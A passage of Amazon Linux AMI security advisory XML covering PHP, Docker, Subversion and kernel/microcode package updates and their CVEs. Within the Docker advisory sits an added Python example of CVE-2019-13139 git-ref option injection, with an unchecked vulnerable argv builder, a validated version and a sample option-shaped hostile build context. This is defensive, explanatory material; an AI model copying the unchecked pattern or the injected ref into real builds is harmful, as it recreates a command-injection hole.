arch="x86_64"><filename>Packages/php73-xml-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.11" 
release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-snmp" 
version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.11" 
release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package 
name="php56-mssql" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.40" release="1.143.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-snmp-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56" 
version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.40" release="1.143.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-embedded-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.40" 
release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.40" 
release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.40-1.143.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1316</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1316: medium priority package update for docker</title><issued date="2019-11-04 18:12:00" /><updated date="2019-11-07 00:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-13509:
In Docker CE and EE before 18.09.8 (as well as Docker EE before 17.06.2-ee-23 and 18.x before 18.03.1-ee-10), Docker Engine in debug mode may sometimes add secrets to the debug log. This applies to a scenario where docker stack deploy is run to redeploy a stack that includes (non external) secrets. It potentially applies to other API users of the stack API if they resend the secret.
99999:
CVE-2019-13509 docker: Docker Engine in debug mode may sometimes add secrets to the debug log leading to information disclosure
CVE-2019-13139:
A command injection flaw was discovered in Docker during the `docker build` command. By providing a specially crafted path argument for the container to build, it is possible to inject command options to the `git fetch`/`git checkout` commands that are executed by Docker and to execute code with the privileges of the user running Docker. A local attacker who can run `docker build` with a controlled build path, or a remote attacker who has control over the docker build path, could elevate their privileges or execute code.
99999:
CVE-2019-13139 docker: command injection due to a missing validation of the git ref command
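Added example (not Docker's own code, nor part of this advisory): the mechanism behind CVE-2019-13139 is that git's option parser treats any argument beginning with a dash as an option, so a ref taken verbatim from a build context and placed on a `git fetch` or `git checkout` command line is a command-option injection. The block below shows the unchecked argv shape beside a validated one. The context grammar `url#ref:subdir`, the function names, the sample contexts and the allowed-character rule are assumptions made for illustration.

```python
# Added example, not Docker's own code: an option-shaped git ref in a build
# context becomes an option on the git command line unless the ref is
# validated first. The 'url#ref:subdir' grammar, helper names and sample
# contexts below are assumptions for illustration.
import re

# Constructed sample contexts: one benign, one whose ref is option-shaped.
BENIGN_CONTEXT = "https://example.invalid/repo.git#release-1.0:docker"
HOSTILE_CONTEXT = "https://example.invalid/repo.git#--some-option=value:docker"

# Assumed rule: a ref must start with an alphanumeric character (never '-',
# which git would parse as an option) and use only a conservative charset.
REF_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._/-]*$")


def split_git_context(context):
    """Split 'url#ref:subdir' into (url, ref, subdir); ref and subdir may be ''."""
    url, _, fragment = context.partition("#")
    ref, _, subdir = fragment.partition(":")
    return url, ref, subdir


def fetch_argv_unchecked(ref):
    """Argv a builder that trusts the ref would hand to git (the vulnerable shape)."""
    return ["git", "fetch", "--depth", "1", "origin", ref]


def validate_ref(ref):
    """Return ref if it is a plausible ref name; raise ValueError otherwise."""
    if ref.startswith("-"):
        raise ValueError("ref must not start with '-': %r" % ref)
    if not REF_RE.match(ref):
        raise ValueError("ref contains disallowed characters: %r" % ref)
    return ref


def is_safe_ref(ref):
    """Boolean form of validate_ref for callers that only need a yes/no."""
    try:
        validate_ref(ref)
    except ValueError:
        return False
    return True


def fetch_argv_checked(ref):
    """Hardened shape: the ref is validated before it reaches git."""
    return ["git", "fetch", "--depth", "1", "origin", validate_ref(ref)]


def injected_options(argv):
    """Tokens after 'origin' that git would parse as options instead of refs."""
    tail = argv[argv.index("origin") + 1:]
    return [tok for tok in tail if tok.startswith("-")]


if __name__ == "__main__":
    for ctx in (BENIGN_CONTEXT, HOSTILE_CONTEXT):
        _, ref, _ = split_git_context(ctx)
        unchecked = fetch_argv_unchecked(ref)
        print(ctx)
        print("  unchecked argv:", unchecked, "injected:", injected_options(unchecked))
        try:
            print("  checked argv:  ", fetch_argv_checked(ref))
        except ValueError as exc:
            print("  rejected:", exc)
```

Validation of the ref is the right control here rather than an end-of-options marker: `git checkout -- x` treats `x` as a pathspec, not a branch, so a `--` separator would change the command's meaning instead of merely protecting it.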
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13139" title="" id="CVE-2019-13139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13509" title="" id="CVE-2019-13509" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker-debuginfo" version="18.09.9ce" release="2.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-18.09.9ce-2.52.amzn1.x86_64.rpm</filename></package><package name="docker" version="18.09.9ce" release="2.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-18.09.9ce-2.52.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1317</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1317: important priority package update for subversion</title><issued date="2019-11-04 18:16:00" /><updated date="2019-11-07 00:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-0203:
In Apache Subversion versions up to and including 1.9.10, 1.10.4, 1.12.0, Subversion&#039;s svnserve server process may exit when a client sends certain sequences of protocol commands. This can lead to disruption for users of the server.
99999:
CVE-2019-0203 subversion: NULL pointer dereference in svnserve leading to an unauthenticated remote DoS
CVE-2018-11782:
In Apache Subversion versions up to and including 1.9.10, 1.10.4, 1.12.0, Subversion&#039;s svnserve server process may exit when a well-formed read-only request produces a particular answer. This can lead to disruption for users of the server.
99999:
CVE-2018-11782 subversion: remotely triggerable DoS vulnerability in svnserve &#039;get-deleted-rev&#039;
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11782" title="" id="CVE-2018-11782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0203" title="" id="CVE-2019-0203" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_dav_svn" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_dav_svn-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-python27" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python27-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.9.7" 
release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python26-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="mod24_dav_svn" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_dav_svn-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion-python26" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python26-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion-python27" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python27-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.9.7" release="1.60.amzn1" epoch="0" 
arch="i686"><filename>Packages/subversion-debuginfo-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.9.7-1.60.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1318</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1318: medium priority package update for microcode_ctl kernel</title><issued date="2019-11-14 20:06:00" /><updated date="2019-11-16 03:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11139:
Improper conditions check in the voltage modulation interface for some Intel Xeon Scalable Processors may allow a privileged user to potentially enable denial of service via local access.
99999:
CVE-2019-11139 hw: voltage modulation technical advisory
CVE-2019-11135:
TSX Asynchronous Abort condition on some CPUs utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access.
99999:
CVE-2019-11135 hw: TSX Transaction Asynchronous Abort (TAA)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11135" title="" id="CVE-2019-11135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11139" title="" id="CVE-2019-11139" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="microcode_ctl-debuginfo" version="2.1" release="47.36.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-debuginfo-2.1-47.36.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.36.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-2.1-47.36.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.36.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-debuginfo-2.1-47.36.amzn1.i686.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.36.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-2.1-47.36.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.152" release="98.182.amzn1" epoch="0" 